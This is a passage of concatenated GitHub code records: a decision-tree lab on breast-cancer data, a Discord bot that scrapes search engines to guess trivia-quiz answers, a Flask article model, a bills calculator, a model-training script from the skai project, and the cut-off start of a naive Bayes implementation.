pd.read_csv(\"C:/Users/User/Desktop/lab4/wdbc (1).data\",sep=\",\", header=None)\ndata.columns = [\"id\", \"diagnosis\", \"radius_mean\", \"texture_mean\", \"perimeter_mean\", \"area_mean\", \n                \"smoothness_mean\", \"compactness_mean\", \"concavity_mean\", \"concave points_mean\", \n                \"symmetry_mean\", \"fractal_dimension_mean\", \"radius_se\", \"texture_se\", \"perimeter_se\", \n                \"area_se\", \"smoothness_se\", \"compactness_se\", \"concavity_se\", \"concave points_se\", \n                \"symmetry_se\", \"fractal_dimension_se\", \"radius_worst\", \"texture_worst\", \n                \"perimeter_worst\", \"area_worst\", \"smoothness_worst\", \"compactness_worst\", \n                \"concavity_worst\", \"concave points_worst\", \"symmetry_worst\", \"fractal_dimension_worst\"]\n\ndata = data.drop([\"id\"], axis=1)\n\n# Print information about the classes and sample counts\nprint(\"Classes: \", data['diagnosis'].unique())\nprint(\"Number of samples: \", len(data))\nprint(\"Number of samples per class:\")\nprint(data['diagnosis'].value_counts())\n\n# check for missing values\nprint(\"Missing values: \", data.isnull().sum().sum())\n\n# split into train and test sets\nX = data.drop([\"diagnosis\"], axis=1)\ny = data[\"diagnosis\"]\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)\n\n# decision tree\nclf = DecisionTreeClassifier(random_state=42)\nclf.fit(X_train, y_train)\n\n# predictions on the test data\npredictions = clf.predict(X_test)\n\n\n# confusion matrix and classification statistics\nprint(confusion_matrix(y_test, predictions))\nprint(classification_report(y_test, predictions))\n\n
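# Note: sklearn's confusion_matrix puts the true labels in rows and the\n# predicted labels in columns, with the classes in sorted order ('B', 'M' here).\n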
# Display the tree\nplt.figure(figsize=(40,30))\ntree.plot_tree(clf, filled=True)\nplt.show()\n\n\n# In[2]:\n\n\n# min_samples_leaf\nfor leaf in [5, 10, 25]:\n    clf = DecisionTreeClassifier(random_state=42, min_samples_leaf=leaf)\n    clf.fit(X_train, y_train)\n    print(f\"Score for leaf = {leaf}: {clf.score(X_test, y_test)}\")\n    plt.figure(figsize=(40,30))\n    tree.plot_tree(clf, filled=True)\n    plt.show()\n# The parameter governs further splitting into nodes by first checking that, after the split,\n# both child nodes would hold at least the number of samples set by this parameter. If not,\n# the tree has to pick a different feature for the decision, one that does satisfy this condition.\n# Conclusion: the parameter prevents the data from being fragmented into overly small leaves,\n# which to some extent limits overfitting. If there is too little data then, in the extreme case,\n# no further split takes place at all.\n\n\n\n\n\n\n# In[3]:\n\n\n# max_depth\nfor depth in [1, 5, 10]:\n    clf = DecisionTreeClassifier(random_state=42, max_depth=depth)\n    clf.fit(X_train, y_train)\n    print(f\"max_depth = {depth}: {clf.score(X_test, y_test)}\")\n    # Print the tree\n    plt.figure(figsize=(40,30))\n    tree.plot_tree(clf, filled=True)\n    plt.show()\n    \n# Conclusions: like the other parameters discussed here, it helps limit overfitting, in this case\n# by capping the depth of the tree. In some situations this is a poor choice, e.g. if one branch\n# has not finished splitting its large subset of the data but runs out of allowed tree depth,\n# it cannot partition that subset any further.\n# The other two parameters that constrain the tree (min_samples_leaf, min_samples_split) may\n# therefore be a better option: they limit excessive fragmentation of the data in the leaves\n# without capping the depth of the tree itself.\n# A value too low relative to the total amount of data may end learning too early, before the\n# tree has learned anything, while a value too high may allow overfitting.\n\n\n# In[5]:\n\n\n# min_samples_split\nfor split in [2, 5, 10]:\n    clf = DecisionTreeClassifier(random_state=42, min_samples_split=split)\n    clf.fit(X_train, y_train)\n    print(f\"Score for split = {split}: {clf.score(X_test, y_test)}\")\n    plt.figure(figsize=(40,30))\n    tree.plot_tree(clf, filled=True)\n    plt.show()\n    \n# The parameter sets the minimum number of samples a node must hold before it may be split\n# further. A slightly different approach than min_samples_leaf, because here the sample count\n# is checked before the split rather than after it.\n# A value too high relative to the total amount of data may end learning too early, before the\n# tree has learned anything, while a value too low may allow overfitting.\n
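\n# Beyond inspecting each parameter one at a time as above, the three knobs can\n# also be tuned jointly; a minimal sketch (the grid values and cv=5 are\n# illustrative, reusing the X_train/y_train defined earlier):\nfrom sklearn.model_selection import GridSearchCV\nsearch = GridSearchCV(\n    DecisionTreeClassifier(random_state=42),\n    param_grid={'max_depth': [1, 5, 10],\n                'min_samples_leaf': [5, 10, 25],\n                'min_samples_split': [2, 5, 10]},\n    cv=5)\nsearch.fit(X_train, y_train)\nprint(search.best_params_, search.best_score_)\n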
\n# Lekko odmienne podejście niż min_samples_leaf, bo tutaj sprawdzamy ilosc danych przed podziałem a nie po.\n# Zbyt wysoka wartośc w porównaniu do całkowitej ilości danych może zakończyc naukę zbyt szybko, zanim \n# drzewo czegoś się nauczy, a zbyt mała dopuścić może od przeuczenia\n\n","repo_name":"EldritchE/AI_Uczenie_Maszynowe","sub_path":"Robert Jaworski 81591 LAB4_klasyfikacja z użyciem drzew decyzyjnych.py","file_name":"Robert Jaworski 81591 LAB4_klasyfikacja z użyciem drzew decyzyjnych.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19795366270","text":"\r\nimport discord\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport time\r\nimport os\r\nimport requests\r\nfrom re import split,sub\r\nimport datetime\r\nfrom bs4 import BeautifulSoup\r\nimport random\r\n\r\noverall_miss=0\r\nmiss=0\r\noverall_questions=0\r\no1=\" \"\r\no2=\" \"\r\no3=\" \"\r\nq1=\" \"\r\ncounter=0\r\nl=[]\r\nl1=[]\r\n\r\nClient = discord.Client()\r\nclient = commands.Bot(command_prefix = \"?\")\r\n\r\nchat_filter = [\"DISCOdRD\"]\r\nbypass_list = []\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(\"Bot is online and connected to Discord\")\r\n## await client.say(\"Bot is online and connected to Discord\")\r\n await client.change_presence(game=discord.Game(name=\"Busy Being AWESOME\"))\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n global overall_miss,miss,overall_questions,id1,abcd1,o1,o2,o3,q1,counter,l,l1\r\n \r\n \r\n if message.content.lower().startswith('?miss'):\r\n overall_miss=overall_miss+1\r\n miss=miss+1\r\n \r\n if message.content.lower().startswith('?reset'):\r\n miss=0\r\n counter=0\r\n\r\n \r\n if message.content.lower().startswith('?thankyou'):\r\n \r\n await client.send_message(message.channel, \"Thank you for your TRUST in the BLOT (not a typo)\")\r\n await client.send_message(message.channel, \"Developed by- <@277695189131460609>\")\r\n await client.send_message(message.channel, \"Subscription- FREE until i change my mind :P\")\r\n await client.send_message(message.channel, \"Today's stats = \"+ str(10-miss)+\" / \" +str(10))\r\n #await client.send_message(message.channel, \"Overall stats = \"+ str(overall_questions-overall_miss)+\" / \" +str(overall_questions))\r\n #await client.send_message(message.channel, \"Accuracy = \"+ str((overall_questions-overall_miss)/ overall_questions*100))\r\n #await client.send_message(message.channel, \"BLOT going to Sleep :sleeping:\")\r\n \r\n if message.content.lower() == \"cookie\":\r\n await client.send_message(message.channel, \":cookie:\") #responds with Cookie emoji when someone says \"cookie\"\r\n \r\n if message.content.lower() == \"owner\" or message.content.lower() == \"?father\" or message.content.lower() == \"?owner\" or message.content.lower() == \"?maker\":\r\n await client.send_message(message.channel, \"<@277695189131460609> NISHANTH D A\")\r\n\r\n if message.content.upper().startswith('!PING'):\r\n userID = message.author.id\r\n await client.send_message(message.channel, \"<@%s> Pong!\" % (userID))\r\n \r\n if message.content.upper().startswith('?OFFENDERS'):\r\n for offenders in l1:\r\n if offenders !=\"277695189131460609\":\r\n await client.send_message(message.channel, \"<@%s> \" % (offenders))\r\n \r\n if message.content.upper().startswith('?ROLL'): \r\n userID = message.author.id\r\n if str(userID) in l:\r\n await client.send_message(message.channel, 
\"<@%s> \" % (userID)+\"U have typed ` ?roll ` more than once...as PUNISHMENT you'll be DEAFENED for atleast 24hr... Enjoy the SILENCE\" )\r\n l1.append(str(userID))\r\n else:\r\n ran=random.randint(1, 4)\r\n if ran==1:\r\n color=\"RED -- Griffindor :heart: \"\r\n elif ran==2:\r\n color=\"YELLOW -- Hufflepuff :yellow_heart:\"\r\n elif ran==3:\r\n color=\"BLUE -- Ravenclaw :blue_heart: \" \r\n else :\r\n color=\"GREEN -- Slytherin :green_heart: \"\r\n \r\n await client.send_message(message.channel, \"<@%s> \" % (userID)+str(ran)+\" \"+color)\r\n l.append(str(userID))\r\n \r\n if message.content.lower() == \"?here\": \r\n #await client.send_message(message.channel, \"BOT Offline ...till things calm down :cookie:\")\r\n if str(message.author.id)==\"277695189131460609\" or str(message.author.id)==\"366125961206300673\" or str(message.author.id)==\"447038097893490688\":\r\n id1= str(message.channel.id )\r\n await client.send_message(message.channel, \"Got it\") \r\n \r\n \r\n \r\n if message.content.upper().startswith('!SAY'):\r\n args = message.content.split(\" \")\r\n #args[0] = !SAY\r\n #args[1] = Hey\r\n #args[2] = There\r\n #args[1:] = Hey There\r\n await client.send_message(message.channel, \"%s\" % (\" \".join(args[1:])))\r\n\r\n contents = message.content.split(\" \") #contents is a list type\r\n for word in contents:\r\n if word.upper() in chat_filter:\r\n if not message.author.id in bypass_list:\r\n try:\r\n #await client.delete_message(message)\r\n await asyncio.sleep(1)\r\n await client.send_message(message.channel, \" is not a bad word !!! <@159985870458322944> you NUTS?? :sunglasses: \")#**Hey!** You're not allowed to use that word here!\r\n except discord.errors.NotFound:\r\n return\r\n\r\n if message.content.lower() == \"?end\":\r\n if str(message.author.id)==\"277695189131460609\" or str(message.author.id)==\"436513875744129025\":\r\n counter=counter+1\r\n await client.send_message(discord.Object(id=id1),embed=discord.Embed(description=o1+\"\\n\"+o2+\"\\n\"+o3, colour=0x3DF270,timestamp=datetime.datetime.utcnow()).set_author(name=q1).set_footer(text=\"This Marks the END of \"+str(counter)+\"/10 \"+\" Question\").set_thumbnail(url=\"https://media.dayoftheshirt.com/images/shirts/SZUYqr6vhrvw/teetee_fsociety_1459811529.full.png\"))\r\n \r\n #Default https://media.dayoftheshirt.com/images/shirts/SZUYqr6vhrvw/teetee_fsociety_1459811529.full.png \r\n #BB http://www.dqweek.com/wp-content/uploads/2018/05/BrainBaazi.jpg\r\n #Loco https://pbs.twimg.com/profile_images/958726814377172992/pHAMA2K9.jpg\r\n #SWoo https://is1-ssl.mzstatic.com/image/thumb/Purple118/v4/56/ca/91/56ca9199-cc45-4367-fe4a-ce5a3517e4e6/AppIcon-1x_U007emarketing-0-0-GLES2_U002c0-512MB-sRGB-0-0-0-85-220-0-0-0-5.png/246x0w.jpg\r\n if message.content.lower().startswith('?guess '):\r\n \r\n overall_questions = overall_questions +1\r\n \r\n var=message.content\r\n var=var[6:]\r\n s=var.split(\"\\n\")\r\n \r\n length=len(s) \r\n if(len(s[0])<6):\r\n s[0]=\"\"\r\n \r\n o3=s[length-1]\r\n o2=s[length-2]\r\n o1=s[length-3] \r\n q=\" \"\r\n for i in range(0,length-3):\r\n if q[-1] !=\" \":\r\n q=q+\" \"\r\n q+=s[i]\r\n \r\n #await client.send_message(message.channel, q) \r\n q1=q\r\n q=q.replace(\" \",\"+\")\r\n \r\n \r\n\r\n\r\n## tab=\"https://www.bing.com/search?q=\"\r\n tabb=\"https://search.aol.com/aol/search?s_chn=prt_bon&q=\" \r\n tab1=\"https://search.aol.com/aol/search?s_chn=prt_bon&q=\" #num=30&ei=py29WruLGoiSvQSbsIjYAg&\r\n tab2=\"https://www.google.co.in/search?q=\"\r\n tab3=\"https://duckduckgo.com/html/?q=\"\r\n 
\r\n #await client.send_message(message.channel, tab2+q)\r\n await client.send_message(discord.Object(id=id1),tab2+q)\r\n \r\n## response=requests.get(tab+q+\"&count=30\") \r\n## soup=BeautifulSoup(response.text,\"html.parser\") \r\n response1=requests.get(tabb+q) \r\n soup1=BeautifulSoup(response1.text,\"html.parser\")\r\n #print(soup1)\r\n \r\n \r\n #print (links)\r\n for link in soup1.find_all(\"a\",{\"class\": \" ac-algo fz-l ac-21th lh-24\"}): \r\n firstlink=split(\":(?=http)\",link[\"href\"].replace(\"/url?q=\",\"\"))\r\n break\r\n \r\n \r\n # print (firstlink)\r\n \r\n \r\n \r\n firstlink[0]=firstlink[0][0:]\r\n #print(firstlink[0])\r\n \r\n response2=requests.get(firstlink[0]) \r\n soup2=BeautifulSoup(response2.text,\"html.parser\")\r\n\r\n response3=requests.get(tab3+q) \r\n soup3=BeautifulSoup(response3.text,\"html.parser\")\r\n\r\n \r\n #break\r\n## for anchor in soup.findAll('a', href=True):\r\n## print anchor['href']\r\n## ss1=soup.get_text().lower() \r\n ss2=soup1.get_text().lower()\r\n #print (ss2)\r\n ss3=soup2.get_text().lower()\r\n ss4=soup3.get_text().lower()\r\n ## ss15=ss1.split(\" resultsdate language region\",1)[0]\r\n ## ss1=ss1.split(\" resultsdate language region\",1)[1]\r\n #print(ss1)\r\n## ss1=sub('\\W+','', ss1)\r\n ss2=sub('\\W+','', ss2)\r\n ss3=sub('\\W+','', ss3)\r\n ss4=sub('\\W+','', ss4)\r\n #re.sub('\\W+','', string)\r\n\r\n ox=o1.lower().split(\" \")\r\n oy=o2.lower().split(\" \")\r\n oz=o3.lower().split(\" \")\r\n## print(ox)\r\n## print(oy)\r\n## print(oz)\r\n \r\n\r\n oa=sub('\\W+','', o1)\r\n ob=sub('\\W+','', o2)\r\n oc=sub('\\W+','', o3)\r\n \r\n ca=ss3.count(oa.lower()) \r\n cb=ss3.count(ob.lower())\r\n cc=ss3.count(oc.lower())\r\n \r\n c1= ss2.count(oa.lower()) + ca +ss4.count(oa.lower())#+ss1.count(oa.lower())\r\n c2= ss2.count(ob.lower()) + cb+ss4.count(ob.lower())#+ ss1.count(ob.lower()) \r\n c3= ss2.count(oc.lower()) + cc+ss4.count(oc.lower())#+ ss1.count(oc.lower()) \r\n\r\n print()\r\n m=max(c1,c2,c3)\r\n m1=min(c1,c2,c3)\r\n #await client.send_message(message.channel, o1+\" \"+str(c1)+\" \"+str(ca))\r\n #await client.send_message(message.channel, o2+\" \"+str(c2)+\" \"+str(cb))\r\n #await client.send_message(message.channel, o3+\" \"+str(c3)+\" \"+str(cc))\r\n\r\n \r\n if m==c1:\r\n \r\n await client.send_message(message.channel,\"\\n\"+\"Best Possibility= \"+\"111 \"+o1) \r\n #await client.send_message(discord.Object(id='464836410373832704'), 'hello')\r\n if(m!=0):\r\n## await client.send_message(discord.Object(id=id1),\"\\n\"+\"Best Possibility= \"+\"111 \"+o1) \r\n await client.send_message(discord.Object(id=id1),embed=discord.Embed(description=\"Best Possibility\", colour=0x3DF270).set_author(name=o1,icon_url=\"https://upload.wikimedia.org/wikipedia/commons/thumb/3/3f/NYCS-bull-trans-1.svg/1024px-NYCS-bull-trans-1.svg.png\"))\r\n \r\n elif m==c2:\r\n await client.send_message(message.channel, \"\\n\"+\"Best Possibility= \"+\"222 \"+o2)\r\n## await client.send_message(discord.Object(id=id1), \"\\n\"+\"Best Possibility= \"+\"222 \"+o2) \r\n await client.send_message(discord.Object(id=id1),embed=discord.Embed(description=\"Best Possibility\", colour=0x3DF270).set_author(name=o2,icon_url=\"https://image.ibb.co/bTTHWy/number_2_two_icon_11920.png\"))\r\n \r\n elif m==c3:\r\n await client.send_message(message.channel, \"\\n\"+\"Best Possibility= \"+\"333 \"+o3)\r\n #await client.send_message(discord.Object(id=id1), \"\\n\"+\"Best Possibility= \"+\"333 \"+o3)\r\n await 
client.send_message(discord.Object(id=id1),embed=discord.Embed(description=\"Best Possibility\", colour=0x3DF270).set_author(name=o3,icon_url=\"https://i0.wp.com/tantrwm.com/wp-content/uploads/2016/11/Tantrwm-Video-Production-Wales-Filming-Live-Streaming-Webcasts-Webcastings-Production-3-man-film-crew.png?fit=2000%2C2000\"))\r\n \r\n \r\n if m1==c1:\r\n await client.send_message(message.channel, \"\\n\"+\"Least Possibility= \"+\"111 \"+o1) \r\n if(m!=0):\r\n await client.send_message(discord.Object(id=id1),\"```\\n\"+\"Least Possibility= \"+\"111 \"+o1+\"```\")\r\n \r\n elif m1==c2:\r\n await client.send_message(message.channel, \"\\n\"+\"Least Possibility= \"+\"222 \"+o2)\r\n await client.send_message(discord.Object(id=id1),\"```\\n\"+\"Least Possibility= \"+\"222 \"+o2+\"```\")\r\n elif m1==c3:\r\n await client.send_message(message.channel, \"\\n\"+\"Least Possibility= \"+\"333 \"+o3)\r\n await client.send_message(discord.Object(id=id1),\"```\\n\"+\"Least Possibility= \"+\"333 \"+o3+\"```\")\r\n\r\n \r\n \r\n ## print(c1)\r\n ## print(o2)\r\n ## print(c2)\r\n ## print(o3)\r\n ## print(c3) \r\n\r\n cxx=0\r\n cyy=0\r\n czz=0\r\n abcd=\" \"\r\n \r\n if(len(ox)>=1):\r\n for w in ox:\r\n w=sub('\\W+','', w)\r\n if(len(w)>2 and w !=\"the\" and w !=\"that\" and w !=\"this\" and w !=\"and\" ):\r\n if(w not in oy and w not in oz):\r\n cx=ss2.count(w.lower()) + ss3. count(w.lower())+ss4.count(w.lower())\r\n cxx=cxx+cx \r\n abcd=abcd+ str(w)+\" (\"+str(cx)+\") \"\r\n abcd1 = abcd + \"\\n\" \r\n await client.send_message(message.channel, \" \"+abcd+\" \"+str(cxx) )\r\n abcd=\"\"\r\n## await client.send_message(message.channel, \" \"+ )\r\n if(len(oy)>=1):\r\n for w in oy:\r\n w=sub('\\W+','', w)\r\n if(len(w)>2 and w !=\"the\" and w !=\"that\" and w !=\"this\" and w !=\"and\" ):\r\n if(w not in ox and w not in oz):\r\n cy=ss2.count(w.lower()) + ss3. count(w.lower())+ss4.count(w.lower())\r\n cyy=cyy+cy\r\n abcd=abcd+str(w)+\" (\"+str(cy)+\") \"\r\n abcd1=abcd1+abcd+\"\\n\" \r\n await client.send_message(message.channel, \" \"+abcd+\" \"+str(cyy) )\r\n abcd=\"\"\r\n## await client.send_message(message.channel, \" \"+str(cyy) )\r\n if(len(oz)>=1):\r\n for w in oz:\r\n w=sub('\\W+','', w)\r\n if(len(w)>2 and w !=\"the\" and w !=\"that\" and w !=\"this\" and w !=\"and\" ):\r\n if(w not in oy and w not in ox):\r\n cz=ss2.count(w.lower()) + ss3. count(w.lower())+ss4.count(w.lower())\r\n czz=czz+cz\r\n abcd=abcd+str(w)+\" (\"+str(cz)+\") \"\r\n abcd1=abcd1+abcd+\"\\n\" \r\n await client.send_message(message.channel, \" \"+abcd +\" \"+str(czz) )\r\n abcd=\"\"\r\n## await client.send_message(message.channel, \" \"+str(czz) )\r\n \r\n \r\n if message.content.lower().startswith('?hits'):\r\n await client.send_message(message.channel,embed=discord.Embed(description=abcd1, colour=0x3DF270).set_author(name=\"Hits\",icon_url=\"https://image.ibb.co/n250Jd/iconfinder_white.png\").set_footer(text=\"Be a Fountain. Not a Drain. 
#GiveAndTake\") )\r\n \r\n \r\n \r\n \r\n \r\n\r\nclient.run(os.getenv('TOKEN'))\r\n","repo_name":"nishu88/freefall_discord_bot","sub_path":"test_discord_bot.py","file_name":"test_discord_bot.py","file_ext":"py","file_size_in_byte":14828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73675337688","text":"from config import mysql\n\n\nclass Article(object):\n\n @staticmethod\n def add_article(title, about, content, image, publish, user_id, status):\n connection = mysql.get_db()\n cursor = mysql.get_db().cursor() # створюєм курсор\n sql_query = \"\"\"\n insert into news (title, about, content, image, publish, user_id, status)\n values (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n cursor.execute(sql_query, (title, about, content, image, publish, user_id, status))\n connection.commit()\n cursor.close()\n connection.close()\n\n\n @staticmethod\n def get_all_article() -> list:\n connection = mysql.get_db()\n cursor = mysql.get_db().cursor() # створюєм курсор\n sql_qwery = \"\"\"\n select * from news\n \"\"\"\n cursor.execute(sql_qwery)\n result = cursor.fetchall()\n cursor.close()\n connection.close()\n return result","repo_name":"grine1-flask/newsportal","sub_path":"models/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29029291608","text":"month = int(input())\nwater = 0\ninternet = 0\nothers = 0\nel = 0\nfor _ in range(month):\n electricity = float(input())\n el += electricity\n water += 20\n internet += 15\nothers += (water + internet + el) * 1.2\nmoney = water + internet + el + others\naverage = money / month\nprint(f\"Electricity: {el:.2f} lv\")\nprint(f\"Water: {water:.2f} lv\")\nprint(f\"Internet: {internet:.2f} lv\")\nprint(f\"Other: {others:.2f} lv\")\nprint(f\"Average: {average:.2f} lv\")\n","repo_name":"ilchevai/SoftUni","sub_path":"Programing basic june 2022/for_loop_extra/bills.py","file_name":"bills.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74320272729","text":"r\"\"\"Binary to run training on a single model once.\n\n\n# pylint: enable=line-too-long\n\"\"\"\n\nimport datetime\nimport logging as native_logging\nimport os\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nfrom ml_collections import config_flags\nimport pandas as pd\nfrom skai.model import data\nfrom skai.model import generate_bias_table_lib\nfrom skai.model import models\nfrom skai.model import sampling_policies\nfrom skai.model import train_lib\nfrom skai.model.configs import base_config\nimport tensorflow as tf\n\n\nFLAGS = flags.FLAGS\nconfig_flags.DEFINE_config_file('config')\nflags.DEFINE_bool('keep_logs', True, 'If True, creates a log file in output '\n 'directory. If False, only logs to console.')\nflags.DEFINE_bool(\n 'is_vertex', False, 'True if the training job will be executed on VertexAI.'\n)\nflags.DEFINE_string('ensemble_dir', '', 'If specified, loads the models at '\n 'this directory to consider the ensemble.')\nflags.DEFINE_string(\n 'trial_name',\n None,\n 'Name of the job trial that measurements should be submitted to. 
Format:'\n    ' projects/{project}/locations/{location}/studies/{study}/trials/{trial}',\n)\n\n\ndef main(_) -> None:\n  config = FLAGS.config\n  base_config.check_flags(config)\n\n  if FLAGS.keep_logs and not config.training.log_to_xm:\n    if not tf.io.gfile.exists(config.output_dir):\n      tf.io.gfile.makedirs(config.output_dir)\n    stream = tf.io.gfile.GFile(\n        os.path.join(config.output_dir, 'log'), mode='w'\n    )\n    stream_handler = native_logging.StreamHandler(stream)\n    logging.get_absl_logger().addHandler(stream_handler)\n\n  dataset_builder = data.get_dataset(config.data.name)\n  ds_kwargs = {}\n  if config.data.name == 'waterbirds10k':\n    ds_kwargs = {'corr_strength': config.data.corr_strength}\n  elif config.data.name == 'skai':\n    ds_kwargs.update({\n        'tfds_dataset_name': config.data.tfds_dataset_name,\n        'data_dir': config.data.tfds_data_dir,\n        'labeled_train_pattern': config.data.labeled_train_pattern,\n        'unlabeled_train_pattern': config.data.unlabeled_train_pattern,\n        'validation_pattern': config.data.validation_pattern,\n        'use_post_disaster_only': config.data.use_post_disaster_only,\n        'load_small_images': config.data.load_small_images,\n    })\n    if config.data.use_post_disaster_only:\n      config.model.num_channels = 3\n  if config.upsampling.do_upsampling:\n    ds_kwargs.update({\n        'upsampling_lambda': config.upsampling.lambda_value,\n        'upsampling_signal': config.upsampling.signal,\n    })\n\n  logging.info('Running Round %d of Training.', config.round_idx)\n  get_split_config = lambda x: x if config.data.use_splits else 1\n  if config.round_idx == 0:\n    dataloader = dataset_builder(\n        num_splits=get_split_config(config.data.num_splits),\n        initial_sample_proportion=get_split_config(\n            config.data.initial_sample_proportion),\n        subgroup_ids=config.data.subgroup_ids,\n        subgroup_proportions=config.data.subgroup_proportions, **ds_kwargs)\n  else:\n    # In later rounds, keep track of the split generated in the last round of\n    # active sampling\n    dataloader = dataset_builder(config.data.num_splits,\n                                 initial_sample_proportion=1,\n                                 subgroup_ids=(),\n                                 subgroup_proportions=(),\n                                 **ds_kwargs)\n\n    # Filter each split to only have examples from example_ids_table\n    dataloader.train_splits = [\n        dataloader.train_ds.filter(\n            generate_bias_table_lib.filter_ids_fn(ids_tab)) for\n        ids_tab in sampling_policies.convert_ids_to_table(config.ids_dir)]\n\n  model_params = models.ModelTrainingParameters(\n      model_name=config.model.name,\n      train_bias=config.train_bias,\n      num_classes=config.data.num_classes,\n      num_subgroups=dataloader.num_subgroups,\n      subgroup_sizes=dataloader.subgroup_sizes,\n      worst_group_label=dataloader.worst_group_label,\n      num_epochs=config.training.num_epochs,\n      num_channels=config.model.num_channels,\n      l2_regularization_factor=config.model.l2_regularization_factor,\n      optimizer=config.optimizer.type,\n      learning_rate=config.optimizer.learning_rate,\n      batch_size=config.data.batch_size,\n      load_pretrained_weights=config.model.load_pretrained_weights,\n      use_pytorch_style_resnet=config.model.use_pytorch_style_resnet,\n      do_reweighting=config.reweighting.do_reweighting,\n      reweighting_lambda=config.reweighting.lambda_value,\n      reweighting_signal=config.reweighting.signal\n  )\n  model_params.train_bias = config.train_bias\n  output_dir = config.output_dir\n  if FLAGS.is_vertex:\n    # TODO: go/skai-instadeep - Create output_dir specific to job.\n    start_time = datetime.datetime.now()\n    timestamp = start_time.strftime('%Y-%m-%d-%H%M%S')\n    output_dir = f'{output_dir}_{timestamp}'\n\n    job_id = os.path.basename(FLAGS.trial_name)\n    output_dir = 
os.path.join(config.output_dir, job_id)\n  tf.io.gfile.makedirs(output_dir)\n  example_id_to_bias_table = None\n\n  if config.train_bias or (config.reweighting.do_reweighting and\n                           config.reweighting.signal == 'bias'):\n    # Bias head will be trained as well, so gets bias labels.\n    if config.path_to_existing_bias_table:\n      example_id_to_bias_table = (\n          generate_bias_table_lib.load_existing_bias_table(\n              config.path_to_existing_bias_table,\n              config.bias_head_prediction_signal,\n          )\n      )\n    else:\n      logging.error('Bias table not found')\n      return\n  if config.data.use_splits:\n    # Training a single model on a combination of data splits.\n    included_splits_idx = [int(i) for i in config.data.included_splits_idx]\n    new_train_ds = data.gather_data_splits(included_splits_idx,\n                                           dataloader.train_splits)\n    val_ds = data.gather_data_splits(included_splits_idx, dataloader.val_splits)\n  elif config.data.use_filtering:\n    # Use filter tables to generate subsets.\n    # This allows better control over the number of trained models.\n    # The number of models is independent of the ood ratio. E.g., 10 splits with\n    # an ood ratio of 0.5 train 252 models and with an ood ratio of 0.1 only\n    # 10. Using filtering we can train 50 models for both of these ood ratios.\n    new_train_ds = data.filter_set(\n        dataloader=dataloader,\n        initial_sample_proportion=config.data.initial_sample_proportion,\n        initial_sample_seed=config.data.initial_sample_seed,\n        split_proportion=config.data.split_proportion,\n        split_id=config.data.split_id,\n        split_seed=config.data.split_seed,\n        training=True\n    )\n    val_ds = data.filter_set(\n        dataloader=dataloader,\n        initial_sample_proportion=config.data.initial_sample_proportion,\n        initial_sample_seed=config.data.initial_sample_seed,\n        split_proportion=config.data.split_proportion,\n        split_id=config.data.split_id,\n        split_seed=config.data.split_seed,\n        training=False\n    )\n  else:\n    raise ValueError(\n        'In `config.data`, one of `(use_splits, use_filtering)` must be True.')\n\n  dataloader.train_ds = new_train_ds\n  dataloader.eval_ds['val'] = val_ds\n  experiment_name = 'stage_2' if config.train_bias else 'stage_1'\n\n  if config.save_train_ids:\n    table_name = 'training_ids_table'\n    ids = data.get_ids_from_dataset(dataloader.train_ds)\n    dict_values = {'example_id': ids}\n    df = pd.DataFrame(dict_values)\n    df.to_csv(os.path.join(output_dir, table_name + '.csv'), index=False)\n  # Apply batching (must apply batching only after filtering)\n  dataloader = data.apply_batch(dataloader, config.data.batch_size)\n\n  _ = train_lib.train_and_evaluate(\n      train_as_ensemble=config.train_stage_2_as_ensemble,\n      dataloader=dataloader,\n      model_params=model_params,\n      num_splits=config.data.num_splits,\n      ood_ratio=config.data.ood_ratio,\n      output_dir=output_dir,\n      experiment_name=experiment_name,\n      save_model_checkpoints=config.training.save_model_checkpoints,\n      save_best_model=config.training.save_best_model,\n      early_stopping=config.training.early_stopping,\n      ensemble_dir=FLAGS.ensemble_dir,\n      example_id_to_bias_table=example_id_to_bias_table,\n      vizier_trial_name=FLAGS.trial_name,\n      is_vertex=FLAGS.is_vertex,\n  )\n\n\nif __name__ == '__main__':\n  app.run(main)\n","repo_name":"google-research/skai","sub_path":"src/skai/model/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"31"} +{"seq_id":"13514641458","text":"import numpy as np\nimport math\nimport pandas as pd\n\nstring1_prob1 = 0\nstring1_prob2 = 
0\nstring2_prob1 = 0\nstring2_prob2 = 0\n\ndef parse_data(filepath):\n    file = pd.read_csv(filepath, sep = '\\t', header = None)\n    main_data = file.to_numpy()\n    return main_data\n\ndef calc_std(main_data, data, mean, strings):\n    deviations = []\n    if strings == []:\n        for i in range(0, main_data.shape[1]-1):\n            dev = math.sqrt(np.sum([np.power(k-mean[i],2) for k in data[:,i]])/len(data))\n            deviations.append(dev)\n    else:\n        for i in range(0,strings[0]):\n            dev = math.sqrt(np.sum([np.power(k - mean[i], 2) for k in data[:, i]]) / len(data))\n            deviations.append(dev)\n        deviations.append(1)\n        for i in range(strings[0]+1, main_data.shape[1]-1):\n            dev = math.sqrt(np.sum([np.power(k - mean[i], 2) for k in data[:, i]]) / len(data))\n            deviations.append(dev)\n    return deviations\n\ndef post_prob(main_data, mean, std_dev, data, strings):\n    post = []\n    if strings == []:\n        for i in range(0, len(data)-1):\n            e = np.exp(-np.power((data[i]-mean[i]),2)/(2*np.power(std_dev[i],2)))\n            density = (1/(np.sqrt(2*np.pi)*std_dev[i])) * e\n            post.append(density)\n    else:\n        for i in range(0, strings[0]):\n            e = np.exp(-np.power((data[i] - mean[i]), 2) / (2 * np.power(std_dev[i], 2)))\n            density = (1 / (np.sqrt(2 * np.pi) * std_dev[i])) * e\n            post.append(density)\n        post.append(1)\n        for i in range(strings[0]+1, main_data.shape[1]-1):\n            e = np.exp(-np.power((data[i] - 